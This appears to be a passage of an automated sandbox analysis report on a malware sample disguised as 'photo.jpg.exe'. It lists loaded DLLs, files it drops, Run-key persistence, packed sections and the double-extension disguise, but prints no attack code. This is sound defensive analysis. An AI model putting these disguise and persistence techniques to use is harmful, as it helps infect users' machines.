Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: twinui.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: tasloginbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: commonbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: advpack.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: tasloginbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: commonbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: advpack.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: tasloginbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: commonbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: advpack.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: hjykaiv2.lnk.14.drLNK file: ..\..\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: photo.jpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: photo.jpg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: photo.jpg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Desktop\WindowsFormsApp20250321\WindowsFormsApp\WindowsFormsApp\obj\Release\WindowsFormsApp.pdb source: photo.jpg.exe
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdb source: TASLogin.exe, 0000000E.00000000.1321310909.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000014.00000000.1425365427.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000019.00000000.1510046802.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe.0.dr
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdbTT source: TASLogin.exe, 0000000E.00000000.1321310909.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000014.00000000.1425365427.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000019.00000000.1510046802.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe.0.dr

Data Obfuscation

barindex
Source: photo.jpg.exe, ----------.cs.Net Code: _000A_0004_0006_0007_0005_0005_0001_0006
Source: photo.jpg.exe, ------.cs.Net Code: _0003_000B_0008_0005_0003_0008_0002_000C
Source: initial sampleStatic PE information: section where entry point is pointing to: .ace
Source: photo.jpg.exeStatic PE information: real checksum: 0x46cc2 should be: 0x4dd80
Source: TASLogin.exe.0.drStatic PE information: section name: .ace
Source: TASLogin.exe.0.drStatic PE information: section name: .ace
Source: TASLogin.exe.0.drStatic PE information: section name: .ace
Source: TASLogin.exe.0.drStatic PE information: section name: .ace
Source: TASLogin.exe.0.drStatic PE information: section name: .tvm0
Source: TASLogin.exe.0.drStatic PE information: section name: .ace
Source: TASLogin.exe.0.drStatic PE information: section name: .ace
Source: TASLoginBase.dll.0.drStatic PE information: section name: .]<_
Source: commonbase.dll.0.drStatic PE information: section name: .didata
Source: commonbase.dll.0.drStatic PE information: section name: .FCh
Source: TASLogin.exe.0.drStatic PE information: section name: .ace entropy: 7.998385208344043
Source: TASLogin.exe.0.drStatic PE information: section name: .tvm0 entropy: 7.996916032178618
Source: TASLogin.exe.0.drStatic PE information: section name: .ace entropy: 7.9770180518325455
Source: C:\Users\user\Desktop\photo.jpg.exeFile created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dllJump to dropped file
Source: C:\Users\user\Desktop\photo.jpg.exeFile created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeJump to dropped file
Source: C:\Users\user\Desktop\photo.jpg.exeFile created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLoginBase.dllJump to dropped file
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TASLoginJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TASLoginJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: jpg.exeStatic PE information: photo.jpg.exe
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
